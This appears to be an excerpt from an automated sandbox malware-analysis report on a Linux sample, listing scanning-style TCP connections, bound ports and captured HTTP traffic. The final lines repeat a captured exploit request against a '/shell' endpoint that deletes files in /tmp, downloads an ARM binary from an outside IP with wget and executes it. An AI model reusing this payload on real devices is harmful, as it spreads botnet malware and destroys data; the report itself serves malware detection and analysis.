              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 72.108.74.42:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 198.17.154.26:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 160.143.92.117:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 135.134.159.239:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 190.223.45.85:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 165.188.62.44:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 218.89.81.80:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 204.241.148.137:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 47.45.127.237:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 208.71.119.163:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 222.198.41.31:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 2.74.251.130:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 182.121.193.108:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 126.205.223.163:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 72.251.254.132:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 174.26.79.34:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 173.156.81.81:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 79.203.29.39:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 84.94.29.146:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 104.101.116.202:60001
              Source: global trafficTCP traffic: 192.168.2.23:34070 -> 123.195.104.58:2323
              Source: global trafficTCP traffic: 192.168.2.23:34070 -> 17.70.7.83:2323
              Source: global trafficTCP traffic: 192.168.2.23:34070 -> 74.28.100.202:2323
              Source: global trafficTCP traffic: 192.168.2.23:34070 -> 143.32.92.250:2323
              Source: global trafficTCP traffic: 192.168.2.23:34070 -> 52.79.231.71:2323
              Source: global trafficTCP traffic: 192.168.2.23:34070 -> 57.112.70.8:2323
              Source: global trafficTCP traffic: 192.168.2.23:34070 -> 130.133.22.58:2323
              Source: global trafficTCP traffic: 192.168.2.23:34070 -> 169.109.118.134:2323
              Source: global trafficTCP traffic: 192.168.2.23:34070 -> 88.208.187.157:2323
              Source: global trafficTCP traffic: 192.168.2.23:34070 -> 14.116.233.190:2323
              Source: global trafficTCP traffic: 192.168.2.23:34070 -> 4.43.172.83:2323
              Source: global trafficTCP traffic: 192.168.2.23:34070 -> 194.65.212.156:2323
              Source: global trafficTCP traffic: 192.168.2.23:34070 -> 70.138.187.241:2323
              Source: global trafficTCP traffic: 192.168.2.23:34070 -> 113.195.150.196:2323
              Source: global trafficTCP traffic: 192.168.2.23:34070 -> 95.121.124.186:2323
              Source: global trafficTCP traffic: 192.168.2.23:34070 -> 61.70.250.122:2323
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 86.170.53.107:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 180.248.8.21:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 203.176.45.183:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 122.53.132.229:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 209.49.84.150:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 92.124.60.252:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 115.52.224.139:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 60.60.41.162:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 106.172.163.198:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 65.70.167.105:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 111.130.207.205:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 119.40.96.250:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 151.163.216.8:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 94.253.181.187:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 182.98.239.168:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 58.52.166.56:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 59.41.45.224:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 158.248.3.160:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 75.166.85.52:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 90.254.115.12:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 119.163.10.116:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 209.39.54.122:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 126.60.156.32:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 57.3.199.170:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 202.27.213.221:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 167.48.227.88:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 71.108.144.56:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 108.246.72.74:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 96.107.67.21:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 9.194.50.89:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 137.131.254.22:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 170.84.178.138:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 218.196.123.217:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 95.251.244.138:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 165.114.253.69:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 112.110.89.1:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 158.144.97.195:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 20.233.19.143:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 39.96.229.246:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 189.62.185.2:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 91.18.210.18:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 143.224.144.238:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 120.118.140.160:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 46.115.13.57:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 164.100.7.174:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 211.118.223.21:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 194.233.198.53:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 91.31.148.129:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 8.206.72.175:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 78.155.239.80:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 219.48.10.203:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 27.36.153.232:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 219.95.150.109:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 71.207.211.178:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 200.79.203.81:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 144.162.252.79:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 134.222.246.62:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 49.175.189.148:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 14.30.8.111:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 111.28.52.251:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 136.54.43.15:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 103.53.140.247:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 156.32.93.100:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 24.213.41.172:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 68.180.48.89:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 144.6.62.203:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 106.228.61.53:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 43.94.30.9:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 175.123.136.220:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 132.105.230.84:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 156.97.162.227:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 198.246.56.154:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 94.109.254.153:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 205.72.188.118:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 34.35.107.74:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 144.240.166.255:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 9.5.44.26:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 151.104.251.71:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 157.52.206.247:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 174.128.114.172:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 176.170.117.222:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 74.106.139.170:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 196.218.185.224:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 95.208.37.103:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 96.251.12.179:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 100.220.218.129:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 199.165.29.174:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 73.93.35.181:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 113.19.170.148:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 72.158.157.189:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 8.52.48.115:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 76.223.160.142:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 106.102.194.215:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 177.67.210.86:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 135.158.98.166:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 103.243.238.227:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 100.19.40.185:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 208.56.103.32:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 18.60.171.58:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 67.248.227.249:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 145.119.255.221:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 45.96.87.65:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 151.19.3.35:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 199.28.233.40:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 179.14.62.240:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 199.249.182.114:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 113.107.190.227:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 91.57.152.78:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 213.138.71.78:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 104.209.49.71:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 158.130.165.4:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 199.211.97.174:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 9.135.204.92:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 183.176.237.106:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 152.85.169.140:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 93.111.23.245:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 68.130.7.111:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 84.221.11.27:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 76.193.216.208:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 124.161.2.224:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 119.14.122.138:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 111.229.51.1:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 170.193.179.129:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 101.67.125.12:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 42.94.135.210:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 75.125.83.78:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 35.223.195.176:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 142.56.78.51:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 135.126.160.81:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 126.8.163.150:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 209.12.45.210:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 161.34.154.74:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 31.37.0.236:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 147.238.255.245:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 76.0.57.93:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 204.177.192.168:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 130.47.86.189:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 102.27.2.73:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 79.67.203.76:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 167.249.114.193:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 114.249.23.159:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 155.201.9.57:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 156.199.156.88:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 45.84.57.112:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 50.31.32.115:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 8.213.164.127:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 171.119.172.241:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 207.65.211.154:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 195.94.123.208:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 197.168.205.146:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 183.48.73.4:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 32.200.201.84:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 5.10.122.234:60001
              Source: /tmp/nSg5RM0w0d (PID: 5278)Socket: 127.0.0.1::43829Jump to behavior
              Source: /tmp/nSg5RM0w0d (PID: 5280)Socket: 0.0.0.0::0Jump to behavior
              Source: /tmp/nSg5RM0w0d (PID: 5280)Socket: 0.0.0.0::8000Jump to behavior
              Source: /tmp/nSg5RM0w0d (PID: 5280)Socket: 0.0.0.0::9000Jump to behavior
              Source: /tmp/nSg5RM0w0d (PID: 5280)Socket: 0.0.0.0::8080Jump to behavior
              Source: /tmp/nSg5RM0w0d (PID: 5280)Socket: 0.0.0.0::8081Jump to behavior
              Source: /tmp/nSg5RM0w0d (PID: 5280)Socket: 0.0.0.0::53413Jump to behavior
              Source: /tmp/nSg5RM0w0d (PID: 5280)Socket: 0.0.0.0::52869Jump to behavior
              Source: /tmp/nSg5RM0w0d (PID: 5280)Socket: 0.0.0.0::37215Jump to behavior
              Source: /tmp/nSg5RM0w0d (PID: 5280)Socket: 0.0.0.0::81Jump to behavior
              Source: /tmp/nSg5RM0w0d (PID: 5280)Socket: 0.0.0.0::8089Jump to behavior
              Source: /tmp/nSg5RM0w0d (PID: 5280)Socket: 0.0.0.0::8088Jump to behavior
              Source: /tmp/nSg5RM0w0d (PID: 5280)Socket: 0.0.0.0::8083Jump to behavior
              Source: /tmp/nSg5RM0w0d (PID: 5280)Socket: 0.0.0.0::443Jump to behavior
              Source: /tmp/nSg5RM0w0d (PID: 5280)Socket: 0.0.0.0::4444Jump to behavior
              Source: /tmp/nSg5RM0w0d (PID: 5280)Socket: 0.0.0.0::8001Jump to behavior
              Source: /tmp/nSg5RM0w0d (PID: 5280)Socket: 0.0.0.0::49152Jump to behavior
              Source: /tmp/nSg5RM0w0d (PID: 5280)Socket: 0.0.0.0::40960Jump to behavior
              Source: /tmp/nSg5RM0w0d (PID: 5280)Socket: 0.0.0.0::1024Jump to behavior
              Source: /tmp/nSg5RM0w0d (PID: 5280)Socket: 0.0.0.0::1337Jump to behavior
              Source: /tmp/nSg5RM0w0d (PID: 5280)Socket: 0.0.0.0::420Jump to behavior
              Source: /tmp/nSg5RM0w0d (PID: 5286)Socket: 0.0.0.0::23Jump to behavior
              Source: /tmp/nSg5RM0w0d (PID: 5286)Socket: 0.0.0.0::0Jump to behavior
              Source: /tmp/nSg5RM0w0d (PID: 5286)Socket: 0.0.0.0::80Jump to behavior
              Source: /tmp/nSg5RM0w0d (PID: 5286)Socket: 0.0.0.0::60001Jump to behavior
              Source: /tmp/nSg5RM0w0d (PID: 5286)Socket: 0.0.0.0::8000Jump to behavior
              Source: /tmp/nSg5RM0w0d (PID: 5286)Socket: 0.0.0.0::9000Jump to behavior
              Source: /tmp/nSg5RM0w0d (PID: 5286)Socket: 0.0.0.0::8080Jump to behavior
              Source: /tmp/nSg5RM0w0d (PID: 5286)Socket: 0.0.0.0::8081Jump to behavior
              Source: /tmp/nSg5RM0w0d (PID: 5286)Socket: 0.0.0.0::53413Jump to behavior
              Source: /tmp/nSg5RM0w0d (PID: 5286)Socket: 0.0.0.0::52869Jump to behavior
              Source: /tmp/nSg5RM0w0d (PID: 5286)Socket: 0.0.0.0::37215Jump to behavior
              Source: /tmp/nSg5RM0w0d (PID: 5286)Socket: 0.0.0.0::81Jump to behavior
              Source: /tmp/nSg5RM0w0d (PID: 5286)Socket: 0.0.0.0::8089Jump to behavior
              Source: /tmp/nSg5RM0w0d (PID: 5286)Socket: 0.0.0.0::8088Jump to behavior
              Source: /tmp/nSg5RM0w0d (PID: 5286)Socket: 0.0.0.0::8083Jump to behavior
              Source: /tmp/nSg5RM0w0d (PID: 5286)Socket: 0.0.0.0::443Jump to behavior
              Source: /tmp/nSg5RM0w0d (PID: 5286)Socket: 0.0.0.0::4444Jump to behavior
              Source: /tmp/nSg5RM0w0d (PID: 5286)Socket: 0.0.0.0::8001Jump to behavior
              Source: /tmp/nSg5RM0w0d (PID: 5286)Socket: 0.0.0.0::49152Jump to behavior
              Source: /tmp/nSg5RM0w0d (PID: 5286)Socket: 0.0.0.0::40960Jump to behavior
              Source: /tmp/nSg5RM0w0d (PID: 5286)Socket: 0.0.0.0::1024Jump to behavior
              Source: /tmp/nSg5RM0w0d (PID: 5286)Socket: 0.0.0.0::1337Jump to behavior
              Source: /tmp/nSg5RM0w0d (PID: 5286)Socket: 0.0.0.0::420Jump to behavior
              Source: /lib/systemd/systemd-journald (PID: 5321)Socket: <unknown socket type>:unknownJump to behavior
              Source: /usr/sbin/gdm3 (PID: 5498)Socket: <unknown socket type>:unknownJump to behavior
              Source: /usr/bin/dbus-daemon (PID: 5527)Socket: <unknown socket type>:unknownJump to behavior
              Source: /lib/systemd/systemd-journald (PID: 5566)Socket: <unknown socket type>:unknownJump to behavior
              Source: /lib/systemd/systemd-journald (PID: 5668)Socket: <unknown socket type>:unknownJump to behavior
              Source: /lib/systemd/systemd-journald (PID: 5746)Socket: <unknown socket type>:unknown
              Source: /lib/systemd/systemd-journald (PID: 5850)Socket: <unknown socket type>:unknown
              Source: /lib/systemd/systemd-journald (PID: 5925)Socket: <unknown socket type>:unknown
              Source: /lib/systemd/systemd-journald (PID: 6033)Socket: <unknown socket type>:unknown
              Source: unknownNetwork traffic detected: HTTP traffic on port 36688 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 36686 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 36690 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36690
              Source: unknownNetwork traffic detected: HTTP traffic on port 36694 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36692
              Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 36692 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36694
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36684
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36686
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36688
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 35442
              Source: unknownNetwork traffic detected: HTTP traffic on port 35442 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 36684 -> 443
              Source: unknownTCP traffic detected without corresponding DNS query: 116.139.20.113
              Source: unknownTCP traffic detected without corresponding DNS query: 53.140.253.164
              Source: unknownTCP traffic detected without corresponding DNS query: 160.244.252.219
              Source: unknownTCP traffic detected without corresponding DNS query: 106.186.4.115
              Source: unknownTCP traffic detected without corresponding DNS query: 143.20.123.85
              Source: unknownTCP traffic detected without corresponding DNS query: 14.85.178.30
              Source: unknownTCP traffic detected without corresponding DNS query: 104.12.55.80
              Source: unknownTCP traffic detected without corresponding DNS query: 74.97.245.104
              Source: unknownTCP traffic detected without corresponding DNS query: 43.26.203.44
              Source: unknownTCP traffic detected without corresponding DNS query: 47.240.228.221
              Source: unknownTCP traffic detected without corresponding DNS query: 124.224.50.17
              Source: unknownTCP traffic detected without corresponding DNS query: 5.236.157.4
              Source: unknownTCP traffic detected without corresponding DNS query: 1.195.166.194
              Source: unknownTCP traffic detected without corresponding DNS query: 116.151.115.9
              Source: unknownTCP traffic detected without corresponding DNS query: 19.234.2.69
              Source: unknownTCP traffic detected without corresponding DNS query: 105.18.136.120
              Source: unknownTCP traffic detected without corresponding DNS query: 69.105.154.223
              Source: unknownTCP traffic detected without corresponding DNS query: 204.59.138.218
              Source: unknownTCP traffic detected without corresponding DNS query: 27.78.60.127
              Source: unknownTCP traffic detected without corresponding DNS query: 167.18.244.178
              Source: unknownTCP traffic detected without corresponding DNS query: 63.35.64.164
              Source: unknownTCP traffic detected without corresponding DNS query: 107.170.129.229
              Source: unknownTCP traffic detected without corresponding DNS query: 17.248.48.48
              Source: unknownTCP traffic detected without corresponding DNS query: 125.193.182.178
              Source: unknownTCP traffic detected without corresponding DNS query: 85.60.0.108
              Source: unknownTCP traffic detected without corresponding DNS query: 47.199.200.41
              Source: unknownTCP traffic detected without corresponding DNS query: 8.26.253.162
              Source: unknownTCP traffic detected without corresponding DNS query: 201.47.82.243
              Source: unknownTCP traffic detected without corresponding DNS query: 163.140.24.2
              Source: unknownTCP traffic detected without corresponding DNS query: 75.240.240.117
              Source: unknownTCP traffic detected without corresponding DNS query: 40.89.53.178
              Source: unknownTCP traffic detected without corresponding DNS query: 72.100.199.25
              Source: unknownTCP traffic detected without corresponding DNS query: 145.66.170.212
              Source: unknownTCP traffic detected without corresponding DNS query: 43.13.225.229
              Source: unknownTCP traffic detected without corresponding DNS query: 138.1.123.135
              Source: unknownTCP traffic detected without corresponding DNS query: 89.76.0.231
              Source: unknownTCP traffic detected without corresponding DNS query: 72.187.244.43
              Source: unknownTCP traffic detected without corresponding DNS query: 184.167.145.52
              Source: unknownTCP traffic detected without corresponding DNS query: 222.148.19.116
              Source: unknownTCP traffic detected without corresponding DNS query: 196.65.168.167
              Source: unknownTCP traffic detected without corresponding DNS query: 4.161.30.32
              Source: unknownTCP traffic detected without corresponding DNS query: 68.140.167.253
              Source: unknownTCP traffic detected without corresponding DNS query: 160.181.217.108
              Source: unknownTCP traffic detected without corresponding DNS query: 57.118.49.254
              Source: unknownTCP traffic detected without corresponding DNS query: 80.196.133.136
              Source: unknownTCP traffic detected without corresponding DNS query: 129.123.171.139
              Source: unknownTCP traffic detected without corresponding DNS query: 115.116.75.75
              Source: unknownTCP traffic detected without corresponding DNS query: 79.192.176.15
              Source: unknownTCP traffic detected without corresponding DNS query: 124.188.25.45
              Source: unknownTCP traffic detected without corresponding DNS query: 88.240.92.22
              Source: syslog.284.drString found in binary or memory: https://www.rsyslog.com
              Source: unknownDNS traffic detected: queries for: daisy.ubuntu.com
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
